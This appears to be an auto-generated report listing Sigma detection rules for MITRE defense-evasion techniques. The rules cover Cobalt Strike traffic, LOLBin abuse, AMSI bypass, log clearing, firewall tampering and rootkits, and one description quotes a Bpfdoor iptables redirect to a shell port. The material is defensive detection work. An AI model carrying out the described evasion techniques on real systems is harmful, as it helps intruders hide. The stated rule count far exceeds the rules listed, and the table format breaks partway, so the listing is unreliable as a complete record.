SigmaTACT - MITRE Tactics and Techniques Report

Summary

This report contains statistical analysis of MITRE Tactics, Techniques, Sub-techniques, Log Sources, and Levels extracted from Sigma rules. Each section provides detailed counts and visualizations to help understand the distribution and frequency of security techniques.



Total Rules Processed: 3721
Total Mitre Tactics Processed: 14
Total Mitre Techniques Processed: 215
Total Mitre Sub Techniques Processed: 232
Total Mitre Other Techniques Processed: 137
Total Log Sources Processed: 47

Top MITRE Tactics

Tactic | Count
attack.defense_evasion | 1394

Rules (1394):

Title | Level | Description
CobaltStrike Malleable Amazon Browsing Traffic Profile | high | Detects Malleable Amazon Profile
CobaltStrike Malformed UAs in Malleable Profiles | critical | Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike
CobaltStrike Malleable (OCSP) Profile | high | Detects Malleable (OCSP) Profile with Typo (OSCP) in URL
CobaltStrike Malleable OneDrive Browsing Traffic Profile | high | Detects Malleable OneDrive Profile
Suspicious CLR Logs Creation | high | Detects suspicious .NET assembly executions. Could detect the use of Cobalt Strike's execute-assembly command.
Suspicious Load of Advapi31.dll | informational | Detects the load of advapi31.dll by a process running in an uncommon folder
SCM DLL Sideload | medium | Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system
Svchost DLL Search Order Hijack | high | Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system. This concerns the IKEEXT and SessionEnv services, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services ("svchost.exe -k netsvcs") to gain code execution on a remote machine.
Possible Process Hollowing Image Loading | high | Detects loading of samlib.dll or WinSCard.dll from an untypical process, e.g. through process hollowing by Mimikatz
Execution via CL_Invocation.ps1 - Powershell | high | Detects execution via SyncInvoke in the CL_Invocation.ps1 module
Execution via CL_Mutexverifiers.ps1 | high | Detects execution via runAfterCancelProcess in the CL_Mutexverifiers.ps1 module
SyncAppvPublishingServer Execution to Bypass Powershell Restriction | medium | Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.
SyncAppvPublishingServer Execution to Bypass Powershell Restriction | medium | Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.
Suspicious In-Memory Module Execution | low | Detects access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a DLL loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see so few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown), which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
Potential NT API Stub Patching | medium | Detects potential NT API stub patching as seen used by the project PatchingAPI
Suspicious Certutil Command Usage | high | Detects a suspicious Microsoft certutil execution with sub commands like 'decode', which is sometimes used to decode malicious code
Cmd Stream Redirection | medium | Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session
Indirect Command Execution via Forfiles | medium | Detects execution of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting.
Indirect Command Execution | low | Detects indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).
Invoke-Obfuscation RUNDLL LAUNCHER | medium | Detects obfuscated PowerShell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Use Rundll32 | high | Detects obfuscated PowerShell via use of Rundll32 in scripts
New Lolbin Process by Office Applications | high | This rule will monitor any Office apps that spin up a new LOLBin process. This activity is pretty suspicious and should be investigated.
Monitoring Wuauclt.exe For Lolbas Execution Of DLL | medium | Adversaries can abuse wuauclt.exe (Windows Update client) to achieve code execution by specifying an arbitrary DLL.
Abusing Findstr for Defense Evasion | medium | Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanisms
Execute MSDT.EXE Using Diagcab File | high | Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190
Process Memory Dumped Via RdrLeakDiag.EXE | high | Detects uses of the rdrleakdiag.exe LOLBIN utility to dump process memory
Application Whitelisting Bypass via DLL Loaded by odbcconf.exe | medium | Detects a defence evasion attempt via odbcconf.exe execution to load a DLL
Excel Proxy Executing Regsvr32 With Payload | high | Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes.
Excel Proxy Executing Regsvr32 With Payload Alternate | high | Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes.
Office Applications Spawning Wmi Cli Alternate | high | Initial execution of a malicious document calls wmic to execute the file with regsvr32
Possible Applocker Bypass | low | Detects execution of executables that can be used to bypass Applocker whitelisting
PowerShell AMSI Bypass Pattern | high | Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.
Base64 Encoded Listing of Shadowcopy | high | Detects base64 encoded listing of Win32_Shadowcopy
Malicious Base64 Encoded Powershell Invoke Cmdlets | high | Detects base64 encoded PowerShell cmdlet invocation of known suspicious cmdlets
Potential PowerShell Base64 Encoded Shellcode | medium | Detects potential PowerShell Base64 encoded shellcode
Suspicious Bitsadmin Job via PowerShell | high | Detects download by BITS jobs via PowerShell
Stop Or Remove Antivirus Service | high | Detects usage of the 'Stop-Service' or 'Remove-Service' PowerShell cmdlet to disable AV services. Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping the antivirus service
Potential Xor Encoded PowerShell Command | medium | Detects usage of "xor" or "bxor" in combination with a "foreach" loop. This pattern is often found in encoded PowerShell code and commands as a way to avoid detection
Regsvr32 Anomaly | high | Detects various anomalies in relation to regsvr32.exe
Renamed PaExec Execution | medium | Detects execution of renamed paexec via imphash and executable product string
Renamed PsExec | high | Detects the execution of a renamed PsExec, often used by attackers or malware
Renamed PowerShell | high | Detects the execution of a renamed PowerShell, often used by attackers or malware
Root Certificate Installed | medium | Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Rundll32 JS RunHTMLApplication Pattern | high | Detects suspicious command line patterns used when rundll32 is used to run JavaScript code
Suspicious Rundll32 Script in CommandLine | medium | Detects suspicious processes related to rundll32 based on arguments
Suspicious Execution of Sc to Delete AV Services | high | Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection
Suspicious Characters in CommandLine | high | Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion
Squirrel Lolbin | medium | Detects possible use of the Squirrel package manager as a Lolbin
Winword.exe Loads Suspicious DLL | medium | Detects Winword.exe loading a custom DLL using the /l flag
WMI Execution Via Office Process | medium | Initial execution of a malicious document calls wmic to execute the file with regsvr32
Windows Update Client LOLBIN | high | Detects code execution via the Windows Update client (wuauclt)
Sysinternals SDelete Registry Keys | medium | A general detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of the Sysinternals SDelete tool.
Abusing Windows Telemetry For Persistence - Registry | high | Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
User Account Hidden By Registry | high | Detects a registry modification for a specific user to prevent that user from being listed on the logon screen
Service Binary in Uncommon Folder | medium | Detects the creation of a service with a service binary located in an uncommon directory
Disable Microsoft Office Security Features | high | Detects disabling of Microsoft Office security features via the registry
Office Security Settings Changed | high | Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)
Windows Defender Threat Detection Disabled | high | Detects disabling of Windows Defender threat protection
Suspicious Esentutl Use | high | Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
New Service Uses Double Ampersand in Path | high | Detects a service installation that uses a suspicious double ampersand in the image path value
OpenCanary - HTTPPROXY Login Attempt | high | Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.
AWS CloudTrail Important Change | medium | Detects disabling, deleting and updating of a Trail
Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure | high | Detects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.
AWS Config Disabling Channel/Recorder | high | Detects AWS Config Service disabling
SES Identity Has Been Deleted | medium | Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities
AWS GuardDuty Important Change | high | Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.
AWS SecurityHub Findings Evasion | high | Detects the modification of the findings on SecurityHub.
Azure Active Directory Hybrid Health AD FS New Server | medium | This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid Health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.
Azure Active Directory Hybrid Health AD FS Service Delete | medium | This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid Health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The Health AD FS service can then be deleted after it is no longer needed via HTTP requests to Azure.
Azure Application Deleted | medium | Identifies when an application is deleted in Azure.
Azure Firewall Modified or Deleted | medium | Identifies when a firewall is created, modified, or deleted.
Azure Firewall Rule Collection Modified or Deleted | medium | Identifies when Rule Collections (Application, NAT, and Network) are being modified or deleted.
Azure Kubernetes Events Deleted | medium | Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.
Azure Network Firewall Policy Modified or Deleted | medium | Identifies when a Firewall Policy is modified or deleted.
Azure Owner Removed From Application or Service Principal | medium | Identifies when an owner was removed from an application or service principal in Azure.
Azure Service Principal Created | medium | Identifies when a service principal is created in Azure.
Azure Service Principal Removed | medium | Identifies when a service principal was removed in Azure.
CA Policy Removed by Non Approved Actor | medium | Monitor and alert on conditional access changes where a non-approved actor removed a CA policy.
CA Policy Updated by Non Approved Actor | medium | Monitor and alert on conditional access changes. Is the initiating actor approved to make changes? Review Modified Properties and compare "old" vs "new" values.
New CA Policy by Non-approved Actor | medium | Monitor and alert on conditional access changes.
Bitlocker Key Retrieval | medium | Monitor and alert for Bitlocker key retrieval.
Account Created And Deleted Within A Close Time Frame | high | Detects when an account was created and deleted in a short period of time.
Changes to Device Registration Policy | high | Monitor and alert for changes to the device registration policy.
Users Added to Global or Device Admin Roles | high | Monitor and alert for users added to device admin roles.
Change to Authentication Method | medium | A change to the authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
User Added To Group With CA Policy Modification Access | medium | Monitor and alert on group membership additions to groups that have CA policy modification access
User Removed From Group With CA Policy Modification Access | medium | Monitor and alert on group membership removals from groups that have CA policy modification access
Guest User Invited By Non Approved Inviters | medium | Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.
User Added To Privilege Role | high | Detects when a user is added to a privileged role.
Activity From Anonymous IP Address | high | Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.
Atypical Travel | high | Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
Impossible Travel | high | Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
Suspicious Inbox Forwarding Identity Protection | high | Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address
Suspicious Inbox Manipulation Rules | high | Detects when suspicious rules that delete or move messages or folders are set on a user's inbox.
Suspicious Browser Activity | high | Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser
Azure AD Threat Intelligence | high | Indicates user activity that is unusual for the user or consistent with known attack patterns.
New Country | high | Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
Unfamiliar Sign-In Properties | high | Detects sign-ins with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.
Increased Failed Authentications Of Any Type | medium | Detects when sign-ins increased by 10% or greater.
Measurable Increase Of Successful Authentications | low | Detects when successful sign-ins increased by 10% or greater.
Device Registration or Join Without MFA | medium | Monitor and alert for device registration or join events where MFA was not performed.
Suspicious SignIns From A Non Registered Device | high | Detects risky authentication from a non-AD-registered device without MFA being required.
Sign-ins from Non-Compliant Devices | high | Monitor and alert for sign-ins where the device was non-compliant.
Sign-ins by Unknown Devices | low | Monitor and alert for sign-ins by unknown devices from non-trusted locations.
Application Using Device Code Authentication Flow | medium | Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.
Applications That Are Using ROPC Authentication Flow | medium | Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.
Bitbucket Global Secret Scanning Rule Deleted | medium | Detects Bitbucket global secret scanning rule deletion activity.
Bitbucket Global SSH Settings Changed | medium | Detects Bitbucket global SSH access configuration changes.
Bitbucket Audit Log Configuration Updated | medium | Detects changes to the Bitbucket audit log configuration.
Bitbucket Project Secret Scanning Allowlist Added | low | Detects when a secret scanning allowlist rule is added for projects.
Bitbucket Secret Scanning Exempt Repository Added | high | Detects when a repository is exempted from the secret scanning feature.
Bitbucket Secret Scanning Rule Deleted | low | Detects when a secret scanning rule is deleted for the project or repository.
Bitbucket User Login Failure | medium | Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use it with correlation based on the "author.name" field.
Cisco Duo Successful MFA Authentication Via Bypass Code | medium | Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.
GCP Break-glass Container Workload Deployed | medium | Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.
Google Cloud Firewall Modified or Deleted | medium | Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).
Github High Risk Configuration Disabled | high | Detects when a user disables a critical security feature for an organization.
Github New Secret Created | low | Detects when a user creates an action secret for the organization, environment, codespaces or repository.
Github Push Protection Bypass Detected | low | Detects when a user bypasses the push protection on a secret detected by secret scanning.
Github Push Protection Disabled | high | Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.
Github Secret Scanning Feature Disabled | high | Detects if the secret scanning feature is disabled for an enterprise or repository.
Github Self Hosted Runner Changes Detected | low | A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once detected, a self-hosted runner configuration change should be validated from the GitHub UI because the log entry may not provide full context.
Azure Login Bypassing Conditional Access Policies | high | Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith.
Okta MFA Reset or Deactivated | medium | Detects an attempt at deactivating or resetting MFA.
Okta User Session Start Via An Anonymising Proxy Service | high | Detects when an Okta user session starts where the user is behind an anonymising proxy service.
Auditing Configuration Changes on Linux Host | high | Detects changes in auditd configuration files
Binary Padding - Linux | high | Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file.
Bpfdoor TCP Ports Redirect | medium | All TCP traffic on a particular port from the attacker is routed to a different port, e.g. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'. The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.
File Time Attribute Change - Linux | medium | Detects file time attribute changes to hide new files or changes to existing files.
Remove Immutable File Attribute - Auditd | medium | Detects removal of the immutable file attribute.
Disable System Firewall | high | Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.
File or Folder Permissions Change | low | Detects file and folder permission changes.
Use Of Hidden Paths Or Files | low | Detects calls to hidden files or files located in hidden directories in NIX systems.
Hidden Files and Directories | low | Detects an adversary creating a hidden file or directory, by detecting directories or files with . as the first character
Steganography Hide Zip Information in Picture File | low | Detects appending of a zip file to an image
Modification of ld.so.preload | high | Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.
Logging Configuration Changes on Linux Host | high | Detects changes to syslog daemon configuration files
Masquerading as Linux Crond Process | medium | Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
Modify System Firewall | medium | Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this.
Steganography Hide Files with Steghide | low | Detects embedding of files with usage of the steghide binary; adversaries may use this technique to prevent the detection of hidden information.
Steganography Extract Files with Steghide | low | Detects extraction of files with usage of the steghide binary; adversaries may use this technique to prevent the detection of hidden information.
Steganography Unzip Hidden Information From Picture File | low | Detects extraction of a zip file from an image file
Potential Suspicious BPF Activity - Linux | high | Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages, which could be a sign of suspicious eBPF activity on the system.
Linux Command History Tampering | high | Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".
Disabling Security Tools - Builtin | medium | Detects disabling of security tools
Triple Cross eBPF Rootkit Default LockFile | high | Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
Triple Cross eBPF Rootkit Default Persistence | high | Detects the creation of "ebpfbackdoor" files in both the "cron.d" and "sudoers.d" directories, which are both related to the TripleCross persistence method
Decode Base64 Encoded Text | low | Detects usage of the base64 utility to decode arbitrary base64-encoded text
Linux Base64 Encoded Pipe to Shell | medium | Detects a suspicious process command line that uses base64 encoded input for execution with a shell
Enable BPF Kprobes Tracing | medium | Detects common commands used to enable bpf kprobes tracing
Remove Immutable File Attribute | medium | Detects usage of the 'chattr' utility to remove the immutable file attribute.
Linux Base64 Encoded Shebang In CLI | medium | Detects the presence of a base64 version of the shebang in the command line, which could indicate a malicious payload about to be decoded
Clear Linux Logs | medium | Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
Commands to Clear or Remove the Syslog | high | Detects specific commands commonly used to remove or empty the syslog, which is often used by attackers as a method to hide their tracks
Remove Scheduled Cron Task/Job | medium | Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
Potential Linux Process Code Injection Via DD Utility | medium | Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
Ufw Force Stop Using Ufw-Init | medium | Detects attempts to force stop ufw using ufw-init
ESXi Syslog Configuration Change Via ESXCLI | medium | Detects changes to the ESXi syslog configuration via "esxcli"
File Deletion | informational | Detects file deletion using the "rm", "shred" or "unlink" commands, which are often used by adversaries to delete files left behind by the actions of their intrusion activity
Install Root Certificate | low | Detects installation of a new certificate on the system, which attackers may use to avoid warnings when connecting to controlled web servers or C2s
Suspicious Package Installed - Linux | medium | Detects installation of suspicious packages using system installation utilities
Flush Iptables Ufw Chain | medium | Detects use of iptables to flush all firewall rules, tables and chains and allow all network traffic
Connection Proxy | low | Detects setting of a proxy configuration
Linux Package Uninstall | low | Detects Linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
Disabling Security Tools | medium | Detects disabling of security tools
Disable Or Stop Services | medium | Detects the usage of utilities such as 'systemctl', 'service', etc. to stop or disable tools and services
Chmod Suspicious Directory | medium | Detects chmod targeting files in abnormal directory paths.
Potentially Suspicious Execution From Tmp Folder | high | Detects a potentially suspicious execution of a process located in the '/tmp/' folder
Interactive Bash Suspicious Children | medium | Detects suspicious interactive bash as a parent to rather uncommon child processes
Linux Shell Pipe to Shell | medium | Detects a suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
Touch Suspicious Service File | medium | Detects usage of the "touch" process on a service file.
Triple Cross eBPF Rootkit Execve Hijack | high | Detects execution of the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
Triple Cross eBPF Rootkit Install Commands | high | Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
Decode Base64 Encoded Text - MacOs | low | Detects usage of the base64 utility to decode arbitrary base64-encoded text
Binary Padding - MacOS | high | Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file.
File Time Attribute Change | medium | Detects file time attribute changes to hide new files or changes to existing files
Hidden Flag Set On File/Directory Via Chflags - MacOS | medium | Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
Indicator Removal on Host - Clear Mac System Logs | medium | Detects deletion of local audit logs
Hidden User Creation | medium | Detects creation of a hidden user account on macOS (UserID < 500) or with the IsHidden option
Disable Security ToolsmediumDetects disabling security tools
File Download Via Nscurl - MacOSmediumDetects the execution of the nscurl utility in order to download files.
Payload Decoded and Decrypted via Built-in Utilities (medium): Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
Space After Filename - macOS (low): Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.
Suspicious Execution via macOS Script Editor (medium): Detects when the macOS Script Editor utility spawns an unusual child process.
System Information Discovery Via Sysctl - MacOS (medium): Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information and is primarily used to detect and avoid virtualization and analysis environments.
System Information Discovery Using System_Profiler (medium): Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information and is primarily used for system information discovery. However, "system_profiler" can also be used to determine whether virtualization software is running, for defense evasion purposes.
Potential Base64 Decoded From Images (high): Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
Gatekeeper Bypass via Xattr (low): Detects a macOS Gatekeeper bypass via the xattr utility.
Cisco Clear Logs (high): Detects clearing of the command history in the network OS, which is used for defense evasion.
Cisco Crypto Commands (high): Shows when private keys are being exported from the device, or when new certificates are installed.
Cisco Disabling Logging (high): Detects logging being turned off, locally or remotely.
Cisco File Deletion (medium): Shows which files are being deleted from flash file systems.
Cisco BGP Authentication Failures (low): Detects BGP authentication failures which may be indicative of brute force attacks to manipulate routing.
Cisco LDP Authentication Failures (low): Detects LDP authentication failures which may be indicative of brute force attacks to manipulate MPLS labels.
Huawei BGP Authentication Failures (low): Detects BGP authentication failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5 (low): Detects Juniper BGP sessions missing an MD5 digest, which may be indicative of brute force attacks to manipulate routing.
Download from Suspicious Dyndns Hosts (medium): Detects downloads of certain file types from hosts with dynamic DNS names (selected list).
HackTool - CobaltStrike Malleable Profile Patterns - Proxy (high): Detects Cobalt Strike malleable profile patterns (URI, User-Agents, Methods).
HackTool - Empire UserAgent URI Combo (high): Detects user agent and URI paths used by Empire agents.
Raw Paste Service Access (high): Detects direct access to raw pastes on different paste services, often used by malware in its second stage to download malicious code in encrypted or encoded form.
Flash Player Update from Suspicious Location (high): Detects a Flash Player update from an unofficial location.
Telegram API Access (medium): Detects suspicious requests to the Telegram API without the usual Telegram User-Agent.
Bitsadmin to Uncommon IP Server Address (high): Detects Bitsadmin connections to IP addresses instead of FQDNs.
Bitsadmin to Uncommon TLD (high): Detects Bitsadmin connections to domains with uncommon TLDs.
HTTP Request With Empty User Agent (medium): Detects a potentially suspicious empty user agent string in proxy logs. Could indicate an uncommon request method.
Windows PowerShell User Agent (medium): Detects web access with the Windows PowerShell user agent.
Server Side Template Injection Strings (high): Detects SSTI attempts sent via GET requests in access logs.
Microsoft Malware Protection Engine Crash (high): Detects a suspicious crash of the Microsoft Malware Protection Engine.
Audit CVE Event (critical): Detects events generated by user-mode applications when they call the CveEventWrite API while a known vulnerability is being exploited. Microsoft started using this log in January 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.
Backup Catalog Deleted (medium): Detects backup catalog deletions.
Restricted Software Access By SRP (high): Detects access to applications that was restricted by a Software Restriction Policies (SRP) policy.
MSI Installation From Web (medium): Detects installation of a remote MSI file from the web.
MSSQL Disable Audit Settings (high): Detects when an attacker issues the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" statement in order to delete or disable audit logs on the server.
Microsoft Malware Protection Engine Crash - WER (high): Detects a suspicious crash of the Microsoft Malware Protection Engine as reported by Windows Error Reporting (WER).
Sysinternals Tools AppX Versions Execution (low): Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as PsExec and ProcDump while avoiding detections based on system paths.
Deployment AppX Package Was Blocked By AppLocker (medium): Detects an AppX package deployment that was blocked by AppLocker policy.
Potential Malicious AppX Package Installation Attempts (medium): Detects potential installation or installation attempts of known malicious AppX packages.
Deployment Of The AppX Package Was Blocked By The Policy (medium): Detects an AppX package deployment that was blocked by the local computer policy.
Suspicious AppX Package Installation Attempt (medium): Detects an AppX package installation with the error code "0x80073cff", which indicates that the package didn't meet the signing requirements and could be suspicious.
Suspicious Remote AppX Package Locations (high): Detects an AppX package added to the pipeline of "to be processed" packages which was downloaded from a suspicious domain.
Suspicious AppX Package Locations (high): Detects an AppX package added to the pipeline of "to be processed" packages which is located in a suspicious location.
Uncommon AppX Package Locations (medium): Detects an AppX package added to the pipeline of "to be processed" packages which is located in an uncommon location.
Suspicious Digital Signature Of AppX Package (medium): Detects execution of AppX packages with a known suspicious or malicious signature.
New BITS Job Created Via Bitsadmin (low): Detects the creation of a new BITS job by Bitsadmin.
New BITS Job Created Via PowerShell (low): Detects the creation of a new BITS job by PowerShell.
BITS Transfer Job Downloading File Potential Suspicious Extension (medium): Detects a new BITS transfer job saving local files with potentially suspicious extensions.
BITS Transfer Job Download From File Sharing Domains (high): Detects a BITS transfer job downloading files from a file sharing domain.
BITS Transfer Job Download From Direct IP (high): Detects a BITS transfer job downloading file(s) from a direct IP address.
BITS Transfer Job With Uncommon Or Suspicious Remote TLD (medium): Detects a suspicious download using the BITS client from an FQDN with an uncommon or suspicious TLD. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.
BITS Transfer Job Download To Potential Suspicious Folder (high): Detects a new BITS transfer job where the LocalName/saved file is stored in a potentially suspicious location.
DNS Server Error Failed Loading the ServerLevelPluginDLL (high): Detects a DNS server error in which the plugin DLL specified in the registry could not be loaded.
Uncommon New Firewall Rule Added In Windows Firewall Exception List (medium): Detects when an uncommon rule has been added to the Windows Firewall exception list.
New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application (high): Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.
New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE (medium): Detects the addition of a new "Allow" firewall rule by the WMI process (WmiPrvSE.EXE). This can occur if an attacker leverages PowerShell cmdlets such as "New-NetFirewallRule", or directly uses WMI CIM classes such as "MSFT_NetFirewallRule".
All Rules Have Been Deleted From The Windows Firewall Configuration (high): Detects when all rules have been deleted from the Windows Defender Firewall configuration.
A Rule Has Been Deleted From The Windows Firewall Exception List (medium): Detects when a single rule or all rules have been deleted from the Windows Defender Firewall.
The Windows Defender Firewall Service Failed To Load Group Policy (low): Detects when the Windows Defender Firewall service failed to load Group Policy.
Windows Defender Firewall Has Been Reset To Its Default Configuration (low): Detects when Windows Defender Firewall has been reset to its default configuration.
Windows Firewall Settings Have Been Changed (low): Detects when the settings of the Windows Firewall have been changed.
ETW Logging/Processing Option Disabled On IIS Server (medium): Detects changes to the IIS server configuration that disable or remove the ETW logging/processing option.
HTTP Logging Disabled On IIS Server (high): Detects changes to the IIS server configuration that disable HTTP logging for successful requests.
New Module Module Added To IIS Server (medium): Detects the addition of a new module to an IIS server.
Previously Installed IIS Module Was Removed (low): Detects the removal of a previously installed IIS module.
Remove Exported Mailbox from Exchange Webserver (high): Detects removal of an exported Exchange mailbox, which could be done to cover tracks after ProxyShell exploitation.
Add or Remove Computer from DC (low): Detects the creation or removal of a computer account. Can be used to detect attacks such as DCShadow via the creation of a new SPN.
AD Object WriteDAC Access (critical): Detects WRITE_DAC access to a domain object.
Weak Encryption Enabled and Kerberoast (high): Detects scenarios where weak encryption is enabled for a user profile, which could be used for hash/password cracking.
Security Eventlog Cleared (high): One of the Windows event logs has been cleared, e.g. caused by "wevtutil cl" command execution.
Failed Code Integrity Checks (informational): Detects code integrity failures such as missing page hashes or corrupted drivers due to unauthorized modification. This could be a sign of tampered binaries.
